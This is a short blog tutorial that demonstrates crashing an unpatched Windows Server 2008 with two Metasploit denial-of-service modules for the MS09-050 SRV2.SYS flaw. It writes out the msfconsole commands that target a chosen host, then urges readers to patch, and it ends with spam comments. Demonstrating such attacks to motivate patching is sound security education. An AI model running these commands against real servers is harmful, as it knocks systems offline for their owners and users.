Attacking an unpatched Windows 2008 Server

Microsoft cannot stress enough the importance of keeping your systems patched. And yet, server systems tend to drift from best practice, for several reasons

  • The patch may fail the application that the server is running
  • The patch will require reboot, which may cause unwanted downtime
  • It's simply a hassle
But non-patched systems are a great target for an attacker. Even if the attacker doesn't gain permanent access to the network, he/she can cause nasty Denial of Service (DoS) on an unpatched server.
Here is the attack scenario
We will use a Windows 2008 target for this demonstration. The Win2008 is a good example because even if it was released in 2008, and we now have the R2 version, a lot of companies are just starting to implement it.

The attack is based on two well known vulnerabilities of Win2008 based on SRV2.SYS driver. In Metasploit, these exploits are know as:

  • ms_09_050_smb2_negotiate_pidhigh
  • ms_09_050_smb2_session_logoff
Both are Denial of Service type of attacks, so we'll use them without a payload.

To use these exploits, just fire up the msfconsole and type

msf > use exploit auxiliary/dos/windows/smb/ms_09_050_smb2_negotiate_pidhigh
msf auxiliary(ms_09_050_smb2_negotiate_pidhigh) > set rhost (Target IP address)
msf auxiliary(ms_09_050_smb2_negotiate_pidhigh) > exploit


You can do the same with the second exploit.

Here is the end result from a Metasploit command line point of view.


And here is the end result from a Windows 2008 Console point of view


Conclusion
Although this is just a demo type of exploit, it provides an excellent example of what happens to an unpatched server. Imagine that this was the web server running your Web Site. Now go and patch your systems :)

Talkback and comments are most welcome

2 comments:

Getit said...

Lovely blog it is. Download Zapya for PC to share files and folders easily from PC to Mobile

Sunmugam Chidambaram said...


Good post like to Read More Like this
xender for pc

Designed by Posicionamiento Web